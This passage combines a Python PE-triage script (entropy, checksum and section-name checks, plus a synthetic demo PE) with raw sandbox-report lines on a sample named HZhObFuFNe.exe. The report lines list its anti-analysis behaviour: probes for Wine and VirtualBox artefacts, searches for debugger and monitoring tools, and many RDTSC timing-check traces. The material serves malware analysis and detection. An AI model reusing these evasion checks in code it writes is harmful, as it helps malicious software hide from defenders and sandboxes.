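that reuses the report's section names. Layout and values are assumptions."""
import math
import random
import struct

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".crt", ".textbss"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random data."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(image: bytes, checksum_field: int) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum as CheckSumMappedFile does: sum
    32-bit words with end-around carry, skipping the CheckSum field itself,
    fold to 16 bits, then add the file length."""
    padded = image + b"\x00" * (-len(image) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_field:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def triage(image: bytes) -> dict:
    """Walk the PE32 headers and section table; return the three indicators."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt = e_lfanew + 24                       # optional header follows the COFF header
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    stored = struct.unpack_from("<I", image, opt + 64)[0]
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        raw_name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", image, hdr)
        chars = struct.unpack_from("<I", image, hdr + 36)[0]
        name = raw_name.rstrip(b"\x00").decode("latin-1")
        sections.append({
            "name": name, "va": va,
            "entropy": round(shannon_entropy(image[rptr:rptr + rsize]), 3),
            "has_entry": va <= entry_rva < va + max(vsize, rsize),
            "rights": "".join(f for f, bit in (("E", 0x20000000), ("W", 0x80000000),
                                               ("R", 0x40000000)) if chars & bit),
        })
    ep = next((s["name"] for s in sections if s["has_entry"]), None)
    return {
        "entry_section": ep,
        "entry_outside_standard": ep is not None and ep not in STANDARD_SECTIONS,
        "high_entropy": [s["name"] for s in sections if s["entropy"] >= 7.0],
        "nonstandard_names": [s["name"] for s in sections if s["name"] not in STANDARD_SECTIONS],
        "checksum_stored": stored,
        "checksum_real": pe_checksum(image, opt + 64),
        "sections": sections,
    }


def build_demo_pe(entry_in: str = ".taggant", valid_checksum: bool = True) -> bytes:
    """Assumed layout: 0x400 bytes of headers, then .text, a random-filled
    'vdxoyfiw' and a '.taggant' that holds the entry point (as in the report)."""
    rng = random.Random(1)                    # deterministic stand-in for packed data
    payload = [(".text", b"\x90" * 0x200, 0x60000020),
               ("vdxoyfiw", bytes(rng.randrange(256) for _ in range(0x1000)), 0xE0000020),
               (".taggant", b"\xcc" * 0x200, 0xE0000020)]
    hdr = bytearray(0x400)
    hdr[0:2], hdr[0x40:0x44] = b"MZ", b"PE\x00\x00"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(payload), 0, 0, 0, 0xE0, 0x0102)
    opt, raw, va, body, entry = 0x58, 0x400, 0x1000, b"", 0
    for i, (name, data, chars) in enumerate(payload):
        entry = va if name == entry_in else entry
        struct.pack_into("<8sIIIIIIHHI", hdr, opt + 0xE0 + 40 * i, name.encode(),
                         len(data), va, len(data), raw, 0, 0, 0, 0, chars)
        body, raw, va = body + data, raw + len(data), va + ((len(data) + 0xFFF) & ~0xFFF)
    struct.pack_into("<HBBIIIIII", hdr, opt, 0x10B, 14, 0, 0, 0, 0, entry, 0x1000, 0x2000)
    struct.pack_into("<IIIHHHHHHIII", hdr, opt + 28, 0x400000, 0x1000, 0x200,
                     4, 0, 0, 0, 6, 0, 0, va, 0x400)
    struct.pack_into("<HH", hdr, opt + 68, 2, 0x8140)   # subsystem GUI, DEP/ASLR flags
    struct.pack_into("<I", hdr, opt + 92, 16)           # NumberOfRvaAndSizes
    image = bytearray(bytes(hdr) + body)
    real = pe_checksum(image, opt + 64)
    struct.pack_into("<I", image, opt + 64, real if valid_checksum else real ^ 0x1234)
    return bytes(image)


if __name__ == "__main__":
    for label, img in (("entry in .taggant", build_demo_pe()),
                       ("bad checksum", build_demo_pe(valid_checksum=False))):
        r = triage(img)
        print(label, r["entry_section"], r["high_entropy"],
              hex(r["checksum_stored"]), hex(r["checksum_real"]))
```

To run it on a real file, pass open(path, "rb").read() to triage(); the entropy threshold of 7.0 and the list of names treated as standard are the only tunables, and a checksum of 0 in the header simply means the linker never filled it in, which is common in unsigned binaries and is not by itself suspicious.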

Boot Survival

Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Window searched: window name: FilemonClass (2x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Window searched: window name: PROCMON_WINDOW_CLASS (3x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Window searched: window name: Regmonclass (2x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\HZhObFuFNe.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\HZhObFuFNe.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EFE6F second address: 14EFEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6FA52293C2h 0x0000000b popad 0x0000000c jnp 00007F6FA52293BCh 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F6FA52293BDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EFEA7 second address: 14EFEB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EFEB2 second address: 14EFEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EEEEB second address: 14EEEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF19F second address: 14EF1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007F6FA52293C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF343 second address: 14EF347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF4CA second address: 14EF4CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF4CF second address: 14EF503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524824h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F6FA452481Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 ja 00007F6FA4524816h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF503 second address: 14EF52A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6FA52293BFh 0x00000010 push eax 0x00000011 pop eax 0x00000012 jbe 00007F6FA52293B6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF52A second address: 14EF547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524829h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F11ED second address: 14F1216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov si, 8976h 0x0000000f push 00000000h 0x00000011 sub esi, dword ptr [ebp+122D1D3Dh] 0x00000017 call 00007F6FA52293B9h 0x0000001c jl 00007F6FA52293BEh 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1216 second address: 14F1260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jnp 00007F6FA452481Ah 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F6FA452481Eh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jo 00007F6FA4524825h 0x00000025 jmp 00007F6FA452481Fh 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1260 second address: 14F1265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1367 second address: 14F1371 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1418 second address: 14F1423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA52293B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1423 second address: 14F144A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F6FA4524828h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F144A second address: 14F144E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F14EF second address: 14F14F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F14F6 second address: 14F155B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 59DE52DAh 0x0000000f jmp 00007F6FA52293C4h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F6FA52293B8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 or dword ptr [ebp+122D187Bh], eax 0x00000036 call 00007F6FA52293B9h 0x0000003b push esi 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F155B second address: 14F1566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1566 second address: 14F15A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F6FA52293CEh 0x0000000b jmp 00007F6FA52293C8h 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F6FA52293BEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F15A2 second address: 14F15A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F15A8 second address: 14F15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510B35 second address: 1510B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510B3B second address: 1510B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510B3F second address: 1510B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510CBE second address: 1510D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6FA52293B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d jne 00007F6FA52293F9h 0x00000013 pushad 0x00000014 jmp 00007F6FA52293BBh 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F6FA52293C7h 0x00000020 ja 00007F6FA52293B6h 0x00000026 popad 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510E87 second address: 1510E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6FA452481Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1511673 second address: 151168B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA52293BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151168B second address: 151168F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151168F second address: 1511693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1511693 second address: 1511699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1511803 second address: 1511807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512421 second address: 1512425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151257C second address: 1512580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512580 second address: 15125A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F6FA452481Ch 0x0000000f jbe 00007F6FA4524816h 0x00000015 jno 00007F6FA452481Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512A3C second address: 1512A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6FA52293B6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F6FA52293C8h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512A68 second address: 1512A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512A6C second address: 1512A97 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA52293B6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F6FA52293CBh 0x00000016 jmp 00007F6FA52293C3h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1513AC0 second address: 1513AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1513AC6 second address: 1513ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1513ACB second address: 1513AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB19 second address: 151DB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB1F second address: 151DB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F6FA4524816h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F6FA4524822h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB45 second address: 151DB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F6FA52293C6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB6A second address: 151DB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB6F second address: 151DB89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB89 second address: 151DB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB8D second address: 151DB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D2B4 second address: 151D2C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F6FA4524816h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D6BA second address: 151D6DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F6FA52293B6h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA52293C5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D6DF second address: 151D6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D84A second address: 151D85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F6FA52293BFh 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D85F second address: 151D86B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6FA4524816h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9B9 second address: 151D9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C2h 0x00000007 jo 00007F6FA52293B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9D9 second address: 151D9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9E1 second address: 151D9E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9E6 second address: 151D9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 je 00007F6FA452481Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151F178 second address: 151F17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15218A2 second address: 15218A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15218A6 second address: 1521908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 1257AC31h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F6FA52293B8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 pushad 0x00000029 cmc 0x0000002a call 00007F6FA52293BDh 0x0000002f mov cx, dx 0x00000032 pop edx 0x00000033 popad 0x00000034 call 00007F6FA52293B9h 0x00000039 jne 00007F6FA52293C2h 0x0000003f push eax 0x00000040 pushad 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1521908 second address: 1521923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6FA4524824h 0x0000000c rdtsc
